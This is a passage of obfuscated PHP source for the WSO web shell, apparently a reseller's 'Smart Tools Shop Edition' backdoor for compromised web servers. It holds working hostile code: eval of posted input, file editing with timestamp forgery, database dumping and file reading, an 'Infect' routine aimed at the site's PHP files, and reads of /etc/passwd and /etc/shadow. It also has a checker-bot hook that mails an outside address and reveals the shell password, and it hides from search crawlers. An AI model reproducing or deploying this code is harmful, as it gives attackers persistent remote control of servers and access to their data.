"; } break; case "chmod": if (!empty($_POST["p3"])) { $perms = 0; for ($i = strlen($_POST["p3"]) - 1; $i >= 0; --$i) { $perms += (int) $_POST["p3"][$i] * pow(8, strlen($_POST["p3"]) - $i - 1); } if (!@chmod($_POST["p1"], $perms)) { echo "Can't set permissions!
"; } } clearstatcache(); echo "
"; break; case "edit": if (!is_writable($_POST["p1"])) { echo "File isn't writeable"; break; } if (!empty($_POST["p3"])) { $time = @filemtime($_POST["p1"]); $_POST["p3"] = substr($_POST["p3"], 1); $fp = @fopen($_POST["p1"], "w"); if ($fp) { @fwrite($fp, $_POST["p3"]); @fclose($fp); echo "Saved!
"; @touch($_POST["p1"], $time, $time); } } echo "
"; break; case "hexdump": $c = @file_get_contents($_POST["p1"]); $n = 0; $h = ["00000000
", "", ""]; $len = strlen($c); for ($i = 0; $i < $len; ++$i) { $h[1] .= sprintf("%02X", ord($c[$i])) . " "; switch (ord($c[$i])) { case 0: $h[2] .= " "; break; case 9: $h[2] .= " "; break; case 10: $h[2] .= " "; break; case 13: $h[2] .= " "; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i + 1 < $len) { $h[0] .= sprintf("%08X", $i + 1) . "
"; } $h[1] .= "
"; $h[2] .= "\xa"; } } echo "
" . 
                $h[0] . 
                "
" . 
                $h[1] . 
                "
" . 
                htmlspecialchars($h[2]) . 
                "
"; break; case "rename": if (!empty($_POST["p3"])) { if (!@rename($_POST["p1"], $_POST["p3"])) { echo "Can't rename!
"; } else { die( "" ); } } echo "
"; break; case "touch": if (!empty($_POST["p3"])) { $time = strtotime($_POST["p3"]); if ($time) { if (!touch($_POST["p1"], $time, $time)) { echo "Fail!"; } else { echo "Touched!"; } } else { echo "Bad time format!"; } } clearstatcache(); echo "
"; break; case "frame": $frameSrc = substr( htmlspecialchars($GLOBALS["cwd"]), strlen( htmlspecialchars( $_SERVER[ "DOCUMENT_ROOT" ] ) ) ); if ($frameSrc[0] != "/") { $frameSrc = "/" . $frameSrc; } if ($frameSrc[strlen($frameSrc) - 1] != "/") { $frameSrc = $frameSrc . "/"; } $frameSrc = $frameSrc . htmlspecialchars($_POST["p1"]); echo ""; break; } echo "
"; hardFooter(); } goto XGk3X; wJWJM: if ($cwd[strlen($cwd) - 1] != "/") { $cwd .= "/"; } goto x892n; Bpag2: function actionStringTools() { if (!function_exists("hex2bin")) { function hex2bin($p) { return decbin(hexdec($p)); } } if (!function_exists("binhex")) { function binhex($p) { return dechex(bindec($p)); } } if (!function_exists("hex2ascii")) { function hex2ascii($p) { $r = ""; for ($i = 0; $i < strLen($p); $i += 2) { $r .= chr(hexdec($p[$i] . $p[$i + 1])); } return $r; } } if (!function_exists("ascii2hex")) { function ascii2hex($p) { $r = ""; for ($i = 0; $i < strlen($p); ++$i) { $r .= sprintf("%02X", ord($p[$i])); } return strtoupper($r); } } if ( !function_exists( "full_urlencode" ) ) { function full_urlencode($p) { $r = ""; for ($i = 0; $i < strlen($p); ++$i) { $r .= "%" . dechex(ord($p[$i])); } return strtoupper($r); } } $stringTools = [ "Base64 encode" => "base64_encode", "Base64 decode" => "base64_decode", "Url encode" => "urlencode", "Url decode" => "urldecode", "Full urlencode" => "full_urlencode", "md5 hash" => "md5", "sha1 hash" => "sha1", "crypt" => "crypt", "CRC32" => "crc32", "ASCII to HEX" => "ascii2hex", "HEX to ASCII" => "hex2ascii", "HEX to DEC" => "hexdec", "HEX to BIN" => "hex2bin", "DEC to HEX" => "dechex", "DEC to BIN" => "decbin", "BIN to HEX" => "binhex", "BIN to DEC" => "bindec", "String to lower case" => "strtolower", "String to upper case" => "strtoupper", "Htmlspecialchars" => "htmlspecialchars", "String length" => "strlen", ]; if (isset($_POST["ajax"])) { prototype( md5($_SERVER["HTTP_HOST"]) . "ajax", true ); ob_start(); if (in_array($_POST["p1"], $stringTools)) { echo $_POST["p1"]($_POST["p2"]); } $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='" . addcslashes( htmlspecialchars(ob_get_clean()), " \xd\x9\'\x0" ) . "'; "; echo strlen($temp), "\xa", $temp; die(); } if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { prototype( md5($_SERVER["HTTP_HOST"]) . "ajax", 0 ); } hardHeader(); echo "

String conversions

"; echo "
send using AJAX
"; 
    if (!empty($_POST["p1"])) { 
        if (in_array($_POST["p1"], $stringTools)) { 
            echo htmlspecialchars($_POST["p1"]($_POST["p2"])); 
        } 
    } 
    echo "

Search files:

\x9\x9
\x9\xa\x9\x9\x9 \x9\xa \x9\x9\xa \x9
Text:
Path:
Name:
"; function hardRecursiveGlob($path) { if (substr($path, -1) != "/") { $path .= "/"; } $paths = @array_unique( @array_merge( @glob($path . $_POST["p3"]), @glob($path . "*", GLOB_ONLYDIR) ) ); if (is_array($paths) && @count($paths)) { foreach ($paths as $▟) { if (@is_dir($▟)) { if ($path != $▟) { hardRecursiveGlob($▟); } } else { if ( empty($_POST["p2"]) || @strpos(file_get_contents($▟), $_POST["p2"]) !== false ) { echo "" . htmlspecialchars($▟) . "
"; } } } } } if (@$_POST["p3"]) { hardRecursiveGlob($_POST["c"]); } echo "

Search for hash:

\xa\x9\x9
\x9\x9\x9
\x9
\x9
\xa
\x9\x9
\xa\x9\x9\x9
\x9\x9

"; hardFooter(); } goto aQUM2; J_363: $home_cwd = @getcwd(); goto QdAU6; QdAU6: if (isset($_POST["c"])) { @chdir($_POST["c"]); } goto LarW_; PIzrX: if ( !isset( $_COOKIE[ md5($_SERVER["HTTP_HOST"]) . "key" ] ) ) { prototype( md5($_SERVER["HTTP_HOST"]) . "key", $▙ ); } goto ewK8X; AH6j_: if (!$safe_mode) { error_reporting(0); } goto OUica; fgiAj: function actionRC() { if (!@$_POST["p1"]) { $a = [ "uname" => php_uname(), "php_version" => phpversion(), "VERSION" => VERSION, "safemode" => @ini_get( "safe_mode" ), ]; echo serialize($a); } else { eval($_POST["p1"]); } } goto MBmWc; Y5ImI: function viewPermsColor($f) { if (!@is_readable($f)) { return "" . perms(@fileperms($f)) . ""; } elseif (!@is_writable($f)) { return "" . perms(@fileperms($f)) . ""; } else { return "" . perms(@fileperms($f)) . ""; } } goto n9j03; x892n: function hardHeader() { if (empty($_POST["charset"])) { $_POST["charset"] = $GLOBALS["\xe2\x96\x9c"]; } echo "" . $_SERVER["HTTP_HOST"] . " - WSO " . VERSION . " \xa\xa
\xa\xa
"; $freeSpace = @diskfreespace($GLOBALS["cwd"]); $totalSpace = @disk_total_space($GLOBALS["cwd"]); $totalSpace = $totalSpace ? $totalSpace : 1; $release = @php_uname("r"); $kernel = @php_uname("s"); $explink = "http://noreferer.de/?http://www.exploit-db.com/search/?action=search&description="; if (strpos("Linux", $kernel) !== false) { $explink .= urlencode( "Linux Kernel " . substr($release, 0, 6) ); } else { $explink .= urlencode($kernel . " " . substr($release, 0, 3)); } if ( !function_exists("posix_getegid") ) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(@posix_geteuid()); $gid = @posix_getgrgid(@posix_getegid()); $user = $uid["name"]; $uid = $uid["uid"]; $group = $gid["name"]; $gid = $gid["gid"]; } $cwd_links = ""; $path = explode("/", $GLOBALS["cwd"]); $n = count($path); for ($i = 0; $i < $n - 1; $i++) { $cwd_links .= "" . $path[$i] . "/"; } $charsets = [ "UTF-8", "Windows-1251", "KOI8-R", "KOI8-U", "cp866", ]; $opt_charsets = ""; foreach ($charsets as $▟) { $opt_charsets .= ""; } $m = [ "Sec. Info" => "SecInfo", "Files" => "FilesMan", "Console" => "Console", "Infect" => "Infect", "Sql" => "Sql", "Php" => "Php", "Safe mode" => "SafeMode", "String tools" => "StringTools", "Bruteforce" => "Bruteforce", "Network" => "Network", ]; if (!empty($GLOBALS["\342\x96\233"])) { $m["Logout"] = "Logout"; } $m["Self remove"] = "SelfRemove"; $menu = ""; foreach ($m as $k => $v) { $menu .= "[ " . $k . " ]"; } $drives = ""; if ($GLOBALS["os"] == "win") { foreach (range("c", "z") as $drive) { if (is_dir($drive . ":\")) { $drives .= "[ " . $drive . " ] "; } } } echo "" . "" . "
Shell:
Uname:
User:
Php:
Hdd:
Cwd:" . ($GLOBALS["os"] == "win" ? "
Drives:" : "") . "		Smart Tools Shop Edition. ( www.smarttoolsshop.date | www.smarttoolsshop.link | Check https://pastebin.com/raw/eYRCPvmP Incase the domains went down )
" . substr(@php_uname(), 0, 120) . " [ Google ] [ Exploit-DB ]
" . $uid . " ( " . $user . " ) Group: " . $gid . " ( " . $group . " )
" . @phpversion() . " Safe mode: " . ($GLOBALS["safe_mode"] ? "ON" : "OFF") . " [ phpinfo ] Datetime: " . date("Y-m-d H:i:s") . "
" . viewSize($totalSpace) . " Free: " . viewSize($freeSpace) . " (" . round(100 / ($totalSpace / $freeSpace), 2) . "%)
" . $cwd_links . " " . viewPermsColor($GLOBALS["cwd"]) . " [ home ]
" . $drives . "
Server IP:
" . gethostbyname($_SERVER["HTTP_HOST"]) . "
Client IP:
" . $_SERVER["REMOTE_ADDR"] . "
" . "" . $menu . "
"; } goto qhLgb; hgt_8: function actionSql() { class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname) { switch ($this->type) { case "mysql": if ( $this->link = @mysql_connect($host, $user, $pass, true) ) { return true; } break; case "pgsql": $host = explode(":", $host); if (!$host[1]) { $host[1] = 5432; } if ( $this->link = @pg_connect( "host={$host[0]} port={$host[1]} user={$user} password={$pass} dbname={$dbname}" ) ) { return true; } break; } return false; } function selectdb($db) { switch ($this->type) { case "mysql": if (@mysql_select_db($db)) { return true; } break; } return false; } function query($str) { switch ($this->type) { case "mysql": return $this->res = @mysql_query($str); break; case "pgsql": return $this->res = @pg_query($this->link, $str); break; } return false; } function fetch() { $res = func_num_args() ? func_get_arg(0) : $this->res; switch ($this->type) { case "mysql": return @mysql_fetch_assoc($res); break; case "pgsql": return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch ($this->type) { case "mysql": return $this->query( "SHOW databases" ); break; case "pgsql": return $this->res = $this->query( "SELECT datname FROM pg_database WHERE datistemplate!='t'" ); break; } return false; } function listTables() { switch ($this->type) { case "mysql": return $this->res = $this->query( "SHOW TABLES" ); break; case "pgsql": return $this->res = $this->query( "select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'" ); break; } return false; } function error() { switch ($this->type) { case "mysql": return @mysql_error(); break; case "pgsql": return @pg_last_error(); break; } return false; } function setCharset($str) { switch ($this->type) { case "mysql": if ( function_exists( "mysql_set_charset" ) ) { return @mysql_set_charset($str, $this->link); } else { $this->query( "SET CHARSET " . $str ); } break; case "pgsql": return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch ($this->type) { case "mysql": return $this->fetch( $this->query( "SELECT LOAD_FILE('" . addslashes($str) . "') as file" ) ); break; case "pgsql": $this->query( "CREATE TABLE hard2(file text);COPY hard2 FROM '" . addslashes($str) . "';select file from hard2;" ); $r = []; while ($i = $this->fetch()) { $r[] = $i["file"]; } $this->query( "drop table hard2" ); return ["file" => implode(" ", $r)]; break; } return false; } function dump($table, $fp = false) { switch ($this->type) { case "mysql": $res = $this->query( "SHOW CREATE TABLE `" . $table . "`" ); $create = mysql_fetch_array($res); $sql = $create[1] . ";\xa"; if ($fp) { fwrite($fp, $sql); } else { echo $sql; } $this->query( "SELECT * FROM `" . $table . "`" ); $i = 0; $head = true; while ($▟ = $this->fetch()) { $sql = ""; if ($i % 1000 == 0) { $head = true; $sql = "; "; } $columns = []; foreach ($▟ as $k => $v) { if ($v === null) { $▟[$k] = "NULL"; } elseif (is_int($v)) { $▟[$k] = $v; } else { $▟[$k] = "'" . @mysql_real_escape_string($v) . "'"; } $columns[] = "`" . $k . "`"; } if ($head) { $sql .= "INSERT INTO `" . $table . "` (" . implode(", ", $columns) . ") VALUES \xa\x9(" . implode(", ", $▟) . ")"; $head = false; } else { $sql .= " ,(" . implode(", ", $▟) . ")"; } if ($fp) { fwrite($fp, $sql); } else { echo $sql; } $i++; } if (!$head) { if ($fp) { fwrite($fp, ";\xa\xa"); } else { echo ";\xa "; } } break; case "pgsql": $this->query( "SELECT * FROM " . $table ); while ($▟ = $this->fetch()) { $columns = []; foreach ($▟ as $k => $v) { $▟[$k] = "'" . addslashes($v) . "'"; $columns[] = $k; } $sql = "INSERT INTO " . $table . " (" . implode(", ", $columns) . ") VALUES (" . implode(", ", $▟) . ");" . " "; if ($fp) { fwrite($fp, $sql); } else { echo $sql; } } break; } return false; } } $db = new DbClass($_POST["type"]); if ( @$_POST["p2"] == "download" && @$_POST["p1"] != "select" ) { $db->connect( $_POST["sql_host"], $_POST["sql_login"], $_POST["sql_pass"], $_POST["sql_base"] ); $db->selectdb($_POST["sql_base"]); switch ($_POST["charset"]) { case "Windows-1251": $db->setCharset("cp1251"); break; case "UTF-8": $db->setCharset("utf8"); break; case "KOI8-R": $db->setCharset("koi8r"); break; case "KOI8-U": $db->setCharset("koi8u"); break; case "cp866": $db->setCharset("cp866"); break; } if (empty($_POST["file"])) { ob_start("ob_gzhandler", 4096); header( "Content-Disposition: attachment; filename=dump.sql" ); header( "Content-Type: text/plain" ); foreach ($_POST["tbl"] as $v) { $db->dump($v); } die(); } elseif ($fp = @fopen($_POST["file"], "w")) { foreach ($_POST["tbl"] as $v) { $db->dump($v, $fp); } fclose($fp); unset($_POST["p2"]); } else { die( "" ); } } hardHeader(); echo "

Sql browser

\xa\xa\xa\x9 \x9 \xa\x9\x9\x9 \x9\x9
TypeHostLoginPasswordDatabase
"; $tmp = ""; if (isset($_POST["sql_host"])) { if ( $db->connect( $_POST["sql_host"], $_POST["sql_login"], $_POST["sql_pass"], $_POST["sql_base"] ) ) { switch ($_POST["charset"]) { case "Windows-1251": $db->setCharset("cp1251"); break; case "UTF-8": $db->setCharset("utf8"); break; case "KOI8-R": $db->setCharset("koi8r"); break; case "KOI8-U": $db->setCharset("koi8u"); break; case "cp866": $db->setCharset("cp866"); break; } $db->listDbs(); echo ""; } else { echo $tmp; } } else { echo $tmp; } echo " count the number of rows
\xa "; if (isset($db) && $db->link) { echo "
"; if (!empty($_POST["sql_base"])) { $db->selectdb($_POST["sql_base"]); echo ""; } echo "
Tables:

"; $tbls_res = $db->listTables(); while ($▟ = $db->fetch($tbls_res)) { list($key, $value) = each($▟); if (!empty($_POST["sql_count"])) { $n = $db->fetch( $db->query( "SELECT COUNT(*) as n FROM " . $value . "" ) ); } $value = htmlspecialchars($value); echo " " . $value . "" . (empty($_POST["sql_count"]) ? " " : " ({$n["n"]})") . "
"; } echo "
File path:		"; if (@$_POST["p1"] == "select") { $_POST["p1"] = "query"; $_POST["p3"] = $_POST["p3"] ? $_POST["p3"] : 1; $db->query( "SELECT COUNT(*) as n FROM " . $_POST["p2"] ); $num = $db->fetch(); $pages = ceil($num["n"] / 30); echo "" . $_POST["p2"] . " ({$num["n"]} records) Page # "; echo " of {$pages}"; if ($_POST["p3"] > 1) { echo " < Prev"; } if ($_POST["p3"] < $pages) { echo " Next >"; } $_POST["p3"]--; if ($_POST["type"] == "pgsql") { $_POST["p2"] = "SELECT * FROM " . $_POST["p2"] . " LIMIT 30 OFFSET " . $_POST["p3"] * 30; } else { $_POST["p2"] = "SELECT * FROM `" . $_POST["p2"] . "` LIMIT " . $_POST["p3"] * 30 . ",30"; } echo "

"; } if ( @$_POST["p1"] == "query" && !empty($_POST["p2"]) ) { $db->query(@$_POST["p2"]); if ($db->res !== false) { $title = false; echo ""; $line = 1; while ($▟ = $db->fetch()) { if (!$title) { echo ""; foreach ($▟ as $key => $value) { echo ""; } reset($▟); $title = true; echo ""; $line = 2; } echo ""; $line = $line == 1 ? 2 : 1; foreach ($▟ as $key => $value) { if ($value == null) { echo ""; } else { echo ""; } } echo ""; } echo "
" . $key . "
null" . nl2br(htmlspecialchars($value)) . "
"; } else { echo "
Error: " . htmlspecialchars($db->error()) . "
"; } } echo "

"; echo "

"; if ($_POST["type"] == "mysql") { $db->query( "SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'" ); if ($db->fetch()) { echo "
Load file
"; } } if (@$_POST["p1"] == "loadfile") { $file = $db->loadFile($_POST["p2"]); echo "
" . 
                htmlspecialchars($file["file"]) . 
                "
"; } } else { echo htmlspecialchars($db->error()); } echo "
"; hardFooter(); } goto gaWab; z59JV: if ( isset( $_POST["sts_checker_bot"] ) ) { if ( $_POST[ "sts_checker_bot" ] == "checking" ) { echo "STS.ORIGINAL.SHELL"; die(); } elseif ( $_POST[ "sts_checker_bot" ] == "getfullinfo" ) { $unzip = "1"; $mailer = "0"; if (!class_exists("ZipArchive")) { $unzip = "0"; } $rnd = rand(); if ( @mail( "oNCDbwflMQhNFBCId@proton.me", "Email Sending Test Report ID: " . $rnd, "WORKING!" ) ) { $mailer = "1"; } $the_os = php_uname("s"); $the_host = php_uname("n"); $the_machine_type = php_uname("m"); $the_version = phpversion(); $the_total_disk_space = formatSizeUnits(disk_total_space("/")); echo "STS.VERFIED.SHELL|" . $mailer . "|" . $unzip . "|" . $the_host . "|" . $the_os . "|" . $the_machine_type . "|" . $the_version . "|" . $the_total_disk_space; die(); } elseif ( $_POST[ "sts_checker_bot" ] == "getpassword" ) { echo $pw_unhashed; die(); } elseif ( $_POST[ "sts_checker_bot" ] == "emailcheck" ) { if ( @mail( $_POST[ "sts_checker_bot_email" ], "Email sending tester, Item post date: " . $_POST[ "sts_checker_bot_itemdate" ], "Test successful. Please use this 'Item post date' as reference to find that item: " . $_POST[ "sts_checker_bot_itemdate" ] ) ) { echo "true"; } else { echo "false"; } die(); } } goto w2JVG; XXrTo: function decrypt($str, $pwd) { $pwd = base64_encode($pwd); $str = base64_decode($str); $enc_chr = ""; $enc_str = ""; $i = 0; while ($i < strlen($str)) { for ($j = 0; $j < strlen($pwd); $j++) { $enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j])); $enc_str .= $enc_chr; $i++; if ($i >= strlen($str)) { break; } } } return base64_decode($enc_str); } goto p2UEO; PnC_E: if (!empty($▛)) { if ( isset($_REQUEST["pass"]) && md5($_REQUEST["pass"]) == $▛ ) { prototype(md5($_SERVER["HTTP_HOST"]), $▛); } if ( !isset( $_COOKIE[md5($_SERVER["HTTP_HOST"])] ) || $_COOKIE[md5($_SERVER["HTTP_HOST"])] != $▛ ) { hardLogin(); } } goto Qz4tt; tR9xz: $pw_unhashed = md5( dirname(__FILE__) . $_SERVER["PHP_SELF"] . "!@#$%^&*()_+" ); goto ee0Wn; l0Qok: if ( !empty($_POST["a"]) && function_exists("action" . $_POST["a"]) ) { call_user_func("action" . $_POST["a"]); } goto MfY9i; Qz4tt: if ( !isset( $_COOKIE[ md5($_SERVER["HTTP_HOST"]) . "ajax" ] ) ) { $_COOKIE[ md5($_SERVER["HTTP_HOST"]) . "ajax" ] = (bool) $▘; } goto X14MH; MBmWc: function prototype($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } goto vrXhM; MfY9i: echo "end"; goto OWyZK; OUica: $disable_functions = @ini_get( "disable_functions" ); goto J_363; vrXhM: function actionSecInfo() { hardHeader(); echo "

Server security information

"; function showSecParam($n, $v) { $v = trim($v); if ($v) { echo "" . $n . ": "; if (strpos($v, "\xa") === false) { echo $v . "
"; } else { echo "
" . 
                    $v . 
                    "
"; } } } showSecParam( "Server software", @getenv("SERVER_SOFTWARE") ); if ( function_exists( "apache_get_modules" ) ) { showSecParam( "Loaded Apache modules", implode(", ", apache_get_modules()) ); } showSecParam( "Disabled PHP Functions", $GLOBALS[ "disable_functions" ] ? $GLOBALS[ "disable_functions" ] : "none" ); showSecParam( "Open base dir", @ini_get("open_basedir") ); showSecParam( "Safe mode exec dir", @ini_get( "safe_mode_exec_dir" ) ); showSecParam( "Safe mode include dir", @ini_get( "safe_mode_include_dir" ) ); showSecParam( "cURL support", function_exists("curl_version") ? "enabled" : "no" ); $temp = []; if ( function_exists( "mysql_get_client_info" ) ) { $temp[] = "MySql (" . mysql_get_client_info() . ")"; } if ( function_exists("mssql_connect") ) { $temp[] = "MSSQL"; } if (function_exists("pg_connect")) { $temp[] = "PostgreSQL"; } if (function_exists("oci_connect")) { $temp[] = "Oracle"; } showSecParam( "Supported databases", implode(", ", $temp) ); echo "
"; if ($GLOBALS["os"] == "nix") { showSecParam( "Readable /etc/passwd", @is_readable("/etc/passwd") ? "yes [view]" : "no" ); showSecParam( "Readable /etc/shadow", @is_readable("/etc/shadow") ? "yes [view]" : "no" ); showSecParam( "OS version", @file_get_contents( "/proc/version" ) ); showSecParam( "Distr name", @file_get_contents( "/etc/issue.net" ) ); if (!$GLOBALS["safe_mode"]) { $userful = [ "gcc", "lcc", "cc", "ld", "make", "php", "perl", "python", "ruby", "tar", "gzip", "bzip", "bzip2", "nc", "locate", "suidperl", ]; $danger = [ "kav", "nod32", "bdcored", "uvscan", "sav", "drwebd", "clamd", "rkhunter", "chkrootkit", "iptables", "ipfw", "tripwire", "shieldcc", "portsentry", "snort", "ossec", "lidsadm", "tcplodg", "sxid", "logcheck", "logwatch", "sysmask", "zmbscap", "sawmill", "wormscan", "ninja", ]; $downloaders = [ "wget", "fetch", "lynx", "links", "curl", "get", "lwp-mirror", ]; echo "
"; $temp = []; foreach ($userful as $▟) { if (which($▟)) { $temp[] = $▟; } } showSecParam( "Userful", implode(", ", $temp) ); $temp = []; foreach ($danger as $▟) { if (which($▟)) { $temp[] = $▟; } } showSecParam( "Danger", implode(", ", $temp) ); $temp = []; foreach ($downloaders as $▟) { if (which($▟)) { $temp[] = $▟; } } showSecParam( "Downloaders", implode(", ", $temp) ); echo "
"; showSecParam( "HDD space", ex("df -h") ); showSecParam( "Hosts", @file_get_contents("/etc/hosts") ); showSecParam( "Mount options", @file_get_contents("/etc/fstab") ); } } else { showSecParam( "OS Version", ex("ver") ); showSecParam( "Account Settings", iconv( "CP866", "UTF-8", ex("net accounts") ) ); showSecParam( "User Accounts", iconv( "CP866", "UTF-8", ex("net user") ) ); } echo "
"; hardFooter(); } goto MQqk2; u4WS6: function actionInfect() { hardHeader(); echo "

Infect

"; if ($_POST["p1"] == "infect") { $target = $_SERVER["DOCUMENT_ROOT"]; function ListFiles($dir) { if ($dh = opendir($dir)) { $files = []; $inner_files = []; while ($file = readdir($dh)) { if ($file != "." && $file != "..") { if (is_dir($dir . "/" . $file)) { $inner_files = ListFiles($dir . "/" . $file); if (is_array($inner_files)) { $files = array_merge($files, $inner_files); } } else { array_push($files, $dir . "/" . $file); } } } closedir($dh); return $files; } } foreach (ListFiles($target) as $key => $file) { $nFile = substr($file, -4, 4); if ($nFile == ".php") { if ( $file != $_SERVER[ "DOCUMENT_ROOT" ] . $_SERVER["PHP_SELF"] && is_writeable($file) ) { echo "{$file}
"; $i++; } } } echo "{$i}"; } else { echo "
"; echo "Really want to infect the server? Yes
"; } hardFooter(); } goto G8cmK; H9x18: if (strtolower(substr(PHP_OS, 0, 3)) == "win") { $os = "win"; } else { $os = "nix"; } goto ZuuFx; eAtQG: if (PHP_VERSION_ID < 70000) { @set_magic_quotes_runtime(0); } goto mdCfK; NcQcO: if ( !function_exists( "posix_getgrgid" ) && strpos( $GLOBALS[ "disable_functions" ], "posix_getgrgid" ) === false ) { function posix_getgrgid($p) { return false; } } goto rc2dt; R2HAO: $▙ = md5( $_SERVER["HTTP_USER_AGENT"] ); goto PIzrX; DJcUw: if ( !function_exists( "posix_getpwuid" ) && strpos( $GLOBALS[ "disable_functions" ], "posix_getpwuid" ) === false ) { function posix_getpwuid($p) { return false; } } goto NcQcO; TQhs6: $▚ = "FilesMan"; goto R2HAO; PYh2w: if (empty($_POST["a"])) { if (isset($▚) && function_exists("action" . $▚)) { $_POST["a"] = $▚; } else { $_POST["a"] = "FilesMan"; } } goto l0Qok; w2JVG: $▘ = true; goto TA8hx; dPBlO: @ini_set( "max_execution_time", 0 ); goto Xz07I; W_qyb: function actionLogout() { setcookie( md5($_SERVER["HTTP_HOST"]), "", time() - 3600 ); die("bye!"); } goto O8Bkq; X14MH: function hardLogin() { if ( !empty( $_SERVER[ "HTTP_USER_AGENT" ] ) ) { $userAgents = [ "Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", ]; if ( preg_match( "/" . implode("|", $userAgents) . "/i", $_SERVER[ "HTTP_USER_AGENT" ] ) ) { header( "HTTP/1.0 404 Not Found" ); die(); } } die( "
Password
" ); } goto H9x18; LarW_: $cwd = @getcwd(); goto fqre7; Xz07I: @set_time_limit(0); goto eAtQG; iBn85: function which($p) { $path = ex("which " . $p); if (!empty($path)) { return $path; } return false; } goto fgiAj; OWyZK: ?>